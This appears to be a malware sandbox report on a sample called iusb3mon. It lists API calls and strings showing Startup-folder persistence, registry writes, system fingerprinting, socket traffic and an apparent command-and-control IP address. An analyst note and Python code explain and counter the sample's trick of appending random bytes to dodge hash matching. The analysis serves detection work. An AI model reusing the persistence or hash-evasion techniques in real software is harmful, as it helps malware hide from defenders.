• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AddressLibraryProc$FreeLoad
• String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
• API String ID: 2256533930-3340630095
• Opcode ID: 2b14ee211fc63f79c2c9108d414d0e10f42327263bd3c36f51f3837267a0d36c
• Instruction ID: 2029cc8b842b2d3001bd70a5ad2630c6d369dde5303aaff030e9c93c8f261038
• Opcode Fuzzy Hash: 2b14ee211fc63f79c2c9108d414d0e10f42327263bd3c36f51f3837267a0d36c
• Instruction Fuzzy Hash: 64413A70E1021AAFDB54EBA5CC88DAFBBB9EF88704B114459F915F7210DB71D902CBA0
APIs
• LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 06248E24
• GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 06248E37
• GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 06248E42
• GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 06248E4D
• GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 06248E5B
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 06248E65
• GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 06248E70
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$tDesktop$user32.dll
• API String ID: 2238633743-1569342589
• Opcode ID: ad7fb6adf26f7c9cda074775338ba90f15a346c37ba8f25ace5229c81d95d22f
• Instruction ID: e6cdda1d66f07fd5bcf3d49d17b0086c19ad55de1efc49bf152b3233455a58d7
• Opcode Fuzzy Hash: ad7fb6adf26f7c9cda074775338ba90f15a346c37ba8f25ace5229c81d95d22f
• Instruction Fuzzy Hash: 75213171E60318BFDB50AFA5DC85A9DBAB8EB44710F014126F951F2150E7B49A418F60
APIs
• GetModuleHandleA.KERNEL32(USER32,?,?,?,06253F34), ref: 06253E1D
• GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 06253E35
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 06253E46
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 06253E57
• GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 06253E68
• GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 06253E79
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 06253E8A
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
• API String ID: 667068680-2376520503
• Opcode ID: 10e8779e398d3807aac4e9464b1fd10c44bd1d3bcf341be9fa5209a2f1f06ce2
• Instruction ID: 3f87e52d153d36390278dca533c219c86d90fc50cb6e7660441d0e04e3ae3f71
• Opcode Fuzzy Hash: 10e8779e398d3807aac4e9464b1fd10c44bd1d3bcf341be9fa5209a2f1f06ce2
• Instruction Fuzzy Hash: 78115471D21B92AAD3B19F25BCCCC2A7AE6B748792352143EDE08D2D08D7788442CF71
APIs
• wsprintfA.USER32 ref: 062478C0
• lstrlenA.KERNEL32(?,00000000), ref: 062478E2
  • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
  • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
  • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
• getsockname.WS2_32(?,?,00000001), ref: 06247944
• GetVersionExA.KERNEL32(?), ref: 06247985
• GetLastInputInfo.USER32(?), ref: 062479F3
• GetTickCount.KERNEL32 ref: 062479F9
• GlobalMemoryStatusEx.KERNEL32(?), ref: 06247A1E
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$CountFreeGlobalInfoInputLastLoadMemoryStatusTickVersiongetsocknamelstrlenwsprintf
• String ID: 12.12$@$Console$Groupfenzhu$RDP-Tcp$SYSTEM\CurrentControlSet\Services\%s
• API String ID: 1372434316-3181356800
• Opcode ID: e745104a81381fc6d69e5127a5c16d62740252c48726c9457b51a7237df558cd
• Instruction ID: 25aa4dbedb51b3686eadbdcfcc6ffaf55e33a03262121568ba393b05e22c3e99
• Opcode Fuzzy Hash: e745104a81381fc6d69e5127a5c16d62740252c48726c9457b51a7237df558cd
• Instruction Fuzzy Hash: 8B510FB2D5021CAADBA4EBA1DC49FDE77BCAB08700F004496EA19E6140DB749B84CF61
APIs
• LoadLibraryA.KERNEL32(ws2_32.dll), ref: 062489A5
• GetProcAddress.KERNEL32(00000000,closesocket), ref: 062489B0
• wsprintfA.USER32 ref: 062489E1
• LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06248A3E
• GetProcAddress.KERNEL32(00000000,send), ref: 06248A46
• GetLastError.KERNEL32 ref: 06248A6B
• CloseHandle.KERNEL32(00000000), ref: 06248AAF
• Sleep.KERNEL32(00000002), ref: 06248ABC
• FreeLibrary.KERNEL32(00000000), ref: 06248AD4
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Library$AddressLoadProc$CloseErrorFreeHandleLastSleepwsprintf
• String ID: ID= %d $closesocket$send$ws2_32.dll
• API String ID: 872202526-2339802411
• Opcode ID: c5d004a0d962a7cfad923ed8ff34f701ed81febc8f29f14529d1bff2b804dc21
• Instruction ID: a23144e966af5320da96d4f311369f7cfc395a2f146bdb54df20f6f14a790705
• Opcode Fuzzy Hash: c5d004a0d962a7cfad923ed8ff34f701ed81febc8f29f14529d1bff2b804dc21
• Instruction Fuzzy Hash: 4B41A331D20329EFDB54EFA0D849AAEBBB9FF04301F104555F955A6180C7B49A40CF92
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06243910
• SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06243921
• wsprintfA.USER32 ref: 0624393F
• wsprintfA.USER32 ref: 06243959
• GetFileAttributesA.KERNEL32(?), ref: 06243965
• wsprintfA.USER32 ref: 06243983
• Sleep.KERNEL32(00000064), ref: 0624398A
• CopyFileA.KERNEL32(?,?,00000000), ref: 0624399F
• MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 062439AF
• CreateDirectoryA.KERNEL32(?,00000000), ref: 062439BD
  • Part of subcall function 06243777: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06243788
  • Part of subcall function 06243777: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 062437B8
  • Part of subcall function 06243777: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 062437D1
  • Part of subcall function 06243777: GetFileSize.KERNEL32(00000000,00000000), ref: 062437D9
  • Part of subcall function 06243777: _rand.LIBCMT ref: 0624381A
  • Part of subcall function 06243777: WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 0624384F
  • Part of subcall function 06243777: CloseHandle.KERNEL32(?), ref: 06243860
• SetFileAttributesA.KERNEL32(?,00000000), ref: 062439DF
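The function above resolves its own module path, asks SHGetSpecialFolderPathA for CSIDL 7 (CSIDL_STARTUP), copies itself there, and queues a MoveFileExA with MOVEFILE_DELAY_UNTIL_REBOOT. Its subcall at 06243777 opens a file for writing (GENERIC_WRITE, OPEN_ALWAYS), seeks to the end (FILE_END), calls _rand and writes 0x400 bytes, which reads as appending random padding so the dropped copy no longer hashes like the submitted sample. The Python below is an added example, not Joe Sandbox output and not the sample's code: it hashes only the mapped PE image (headers through the end of the last section's raw data), so a copy that differs only by an appended overlay still matches the original. The toy PE is constructed inline and is not loadable; the 0x400 constant is the WriteFile size from the dump above.

```python
import hashlib
import os
import struct

# Size of the WriteFile in the dumped subcall at 06243777.
OVERLAY_PAD = 0x400


def pe_image_end(data: bytes) -> int:
    """Offset just past the last section's raw data. Bytes beyond it are overlay:
    the loader never maps them, so a dropper can pad there without changing behaviour."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    sections = coff + 20 + opt_size
    end = sections + 40 * num_sections           # never shorter than the headers
    for i in range(num_sections):
        # section header: SizeOfRawData at +16, PointerToRawData at +20
        size_raw, ptr_raw = struct.unpack_from("<II", data, sections + 40 * i + 16)
        if size_raw and ptr_raw:
            end = max(end, ptr_raw + size_raw)
    return min(end, len(data))


def full_sha256(data: bytes) -> str:
    """Whole-file hash, the one an appended overlay defeats."""
    return hashlib.sha256(data).hexdigest()


def image_sha256(data: bytes) -> str:
    """Hash of the mapped image only; stable across appended overlay padding."""
    return hashlib.sha256(data[:pe_image_end(data)]).hexdigest()


def overlay(data: bytes) -> bytes:
    return data[pe_image_end(data):]


def append_random_overlay(data: bytes, n: int = OVERLAY_PAD) -> bytes:
    """Effect of the dumped subcall: open for write, seek to end, write n random bytes."""
    return data + os.urandom(n)


def build_toy_pe() -> bytes:
    """Constructed minimal PE32+ with one section at file offset 0x200, size 0x200.
    Only the fields pe_image_end() reads are meaningful; it is not loadable."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ".ljust(0x40, b"\0"))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0xF0, 0x22)
    opt = bytes(0xF0)                            # optional header placeholder
    # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200,
                      0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + opt + sec).ljust(0x200, b"\0")
    return headers + bytes(range(256)) * 2       # 0x200 bytes of section data


if __name__ == "__main__":
    original = build_toy_pe()
    dropped = append_random_overlay(original)
    print("full-file hash matches :", full_sha256(original) == full_sha256(dropped))   # False
    print("image hash matches     :", image_sha256(original) == image_sha256(dropped)) # True
    print("overlay bytes          :", len(overlay(dropped)))                           # 1024
```

Image-only hashing is only a match aid: it assumes the dropper leaves the mapped image untouched and pads past it. When the copy is instead re-packed or patched, compare per-section hashes or an import hash, and treat a non-zero overlay on a file dropped into the Startup folder as a signal in its own right.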
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$wsprintf$AttributesCreate$CloseCopyDirectoryFolderHandleLibraryLoadModuleMoveNamePathPointerSizeSleepSpecialWrite_rand
                                                                                                                    • String ID: %s.exe$%s\%s
                                                                                                                    • API String ID: 832629782-3574828809
                                                                                                                    • Opcode ID: 58d6bb7ec948bfff9573efbea055f14ef185cf9d00fbbb306ccccbff6c4328ff
                                                                                                                    • Instruction ID: 690b8ae231cd6b02613000c660ec7a1d430345a181e6e65f77675753423d0f36
                                                                                                                    • Opcode Fuzzy Hash: 58d6bb7ec948bfff9573efbea055f14ef185cf9d00fbbb306ccccbff6c4328ff
                                                                                                                    • Instruction Fuzzy Hash: F5313EB291031DABDB60ABE0EC8DEEB777DEB44215F040592F645E2044EA74EB84CF61
                                                                                                                    APIs
                                                                                                                    • wsprintfA.USER32 ref: 06245660
                                                                                                                    • strlen.MSVCRT ref: 06245685
                                                                                                                      • Part of subcall function 06249423: LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,0626CB7A,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001,0626CB7A), ref: 06249450
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06249467
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06249472
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 0624947D
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06249488
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06249493
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0624949E
                                                                                                                      • Part of subcall function 06249423: FreeLibrary.KERNEL32(00000000,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001), ref: 06249592
                                                                                                                    • strlen.MSVCRT ref: 062456A7
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 062456C5
                                                                                                                    • wsprintfA.USER32 ref: 062456ED
                                                                                                                    • strlen.MSVCRT ref: 062456FC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$strlen$Librarywsprintf$FreeLoadLocalTime
                                                                                                                    • String ID: %4d-%.2d-%.2d %.2d:%.2d$202.79.169.178$Console$Groupfenzhu$InstallTime$Remarkbeizhu$SYSTEM\CurrentControlSet\Services\%s
                                                                                                                    • API String ID: 124699875-3629434285
                                                                                                                    • Opcode ID: 2372ee7797c4be00d76d6e58803f36222b9f9190cee52eadbd64f2ce198061d8
                                                                                                                    • Instruction ID: 933589630baf0d4c8ba97ea099e876050d84436e625e2140a8ee96cbc5261ac5
                                                                                                                    • Opcode Fuzzy Hash: 2372ee7797c4be00d76d6e58803f36222b9f9190cee52eadbd64f2ce198061d8
                                                                                                                    • Instruction Fuzzy Hash: 902175B2A603147BDB90B7A6EC8AEFB767DEB08B01F040455FE42E5081E6B5D9808771
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 062412D7
                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 06241328
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 06241333
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateEventH_prologStartup
                                                                                                                    • String ID: $8$g$h$k$m$q$x$y
                                                                                                                    • API String ID: 2400729181-2346024814
                                                                                                                    • Opcode ID: 565927597594e4a4434e3b9eb035082a95dae688d4036c3af538758460074582
                                                                                                                    • Instruction ID: ca6cf319235c9a713f172ff8ad6683ef29c44d6f16923d1d80bf97247f6d2f60
                                                                                                                    • Opcode Fuzzy Hash: 565927597594e4a4434e3b9eb035082a95dae688d4036c3af538758460074582
                                                                                                                    • Instruction Fuzzy Hash: 2421C6309043C5CEE761EBA8D9497EFBFF89F11348F04445DD992A2282DBB55648CBB2
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?), ref: 062490E1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 062490F5
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 062490FF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0624910A
                                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 06249142
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 06249161
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0624916C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
                                                                                                                    • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                                                                    • API String ID: 1314729832-4285911020
                                                                                                                    • Opcode ID: 955261b59553fda468d778bf87d8ffd0a5981d6541f98ccf0d740f09d98ce6e1
                                                                                                                    • Instruction ID: 49f323100add14bcadfa971cea4769ee8da7fb0b155f8d24295be3aff12043c1
                                                                                                                    • Opcode Fuzzy Hash: 955261b59553fda468d778bf87d8ffd0a5981d6541f98ccf0d740f09d98ce6e1
                                                                                                                    • Instruction Fuzzy Hash: 28114C75E11319BBEB21AB619C4DBEFBBBCAF45B10F014095BA44E2140DBB49B81CE61
                                                                                                                    APIs
                                                                                                                    • wsprintfA.USER32 ref: 062440AA
                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0624410F
                                                                                                                    • lstrcatA.KERNEL32(?,Function_00027D6C), ref: 06244155
                                                                                                                    • lstrcatA.KERNEL32(?,062442C0), ref: 06244161
                                                                                                                    • lstrcpyA.KERNEL32(00000000,062442C0), ref: 06244169
                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 062441AF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcat$CreateEnvironmentExpandProcessStringslstrcpywsprintf
                                                                                                                    • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                                    • API String ID: 2973130283-33419044
                                                                                                                    • Opcode ID: 3b1c411c689f285480cbe3fb1afc3641ee868e7bf258dfa60db7c6053d497936
                                                                                                                    • Instruction ID: 7c5d0fba576d9008dc74df320e56556083784b54aaeb192dc848e2826d0c94e1
                                                                                                                    • Opcode Fuzzy Hash: 3b1c411c689f285480cbe3fb1afc3641ee868e7bf258dfa60db7c6053d497936
                                                                                                                    • Instruction Fuzzy Hash: 705176B2D1061DBEEF54AAE0DC88FEB77BCEB54305F1004A6FA05E6140DA719B948F60
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_4d10000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: $8$g$h$k$m$q$x$y
                                                                                                                    • API String ID: 3519838083-2346024814
                                                                                                                    • Opcode ID: 62c5fbcb160e6cc2404c204164438830c7ace46b45df545fd289de1eca745842
                                                                                                                    • Instruction ID: 1aa304120035f5f24fba3440665f05dfd13538a6a7c5f46cd60415924da244f7
                                                                                                                    • Opcode Fuzzy Hash: 62c5fbcb160e6cc2404c204164438830c7ace46b45df545fd289de1eca745842
                                                                                                                    • Instruction Fuzzy Hash: 1A21C2309083849EF711DBA8C8497EFBFF99F15308F00055EE58263282D7B56608C772
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0624739A: wsprintfA.USER32 ref: 06247480
                                                                                                                    • lstrlenA.KERNEL32(00000080,?,?,00000000,?), ref: 06247532
                                                                                                                    • lstrlenA.KERNEL32(00000080,?,?,00000000,?), ref: 0624754A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$wsprintf
                                                                                                                    • String ID: M$MarkTime$T$a$e$i$k$m$r
                                                                                                                    • API String ID: 1220175532-2269700615
                                                                                                                    • Opcode ID: 716dd77bf86e70bbf9b287f6c7aec629c46b7d6280b82da4458aa445d19d21b6
                                                                                                                    • Instruction ID: 12e1013758ec4744a03afd5d08939fea5f0d0045cdfd48ba82d4bbb61134ba99
                                                                                                                    • Opcode Fuzzy Hash: 716dd77bf86e70bbf9b287f6c7aec629c46b7d6280b82da4458aa445d19d21b6
                                                                                                                    • Instruction Fuzzy Hash: DA01A2109082C8F9DB02A7A59C48B9EBF7A9B52608F0480D9ED506A282D3BA5219C772
APIs
• __EH_prolog.LIBCMT ref: 062454A8
  • Part of subcall function 062412D2: __EH_prolog.LIBCMT ref: 062412D7
  • Part of subcall function 062412D2: WSAStartup.WS2_32(00000202,?), ref: 06241328
  • Part of subcall function 062412D2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 06241333
• lstrcatA.KERNEL32(?,0626CA18), ref: 062454F7
• _rand.LIBCMT ref: 06245503
• Sleep.KERNEL32(00000BB8,?,00000000), ref: 0624550D
• GetTickCount.KERNEL32 ref: 0624553D
• GetTickCount.KERNEL32 ref: 06245559
• WaitForSingleObject.KERNEL32(?,00000064), ref: 062455DF
• Sleep.KERNEL32(000001F4), ref: 062455EC
  • Part of subcall function 0624180D: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06241832
  • Part of subcall function 0624180D: CancelIo.KERNEL32(?,?,?,?,0624560D), ref: 0624183B
  • Part of subcall function 0624180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06241847
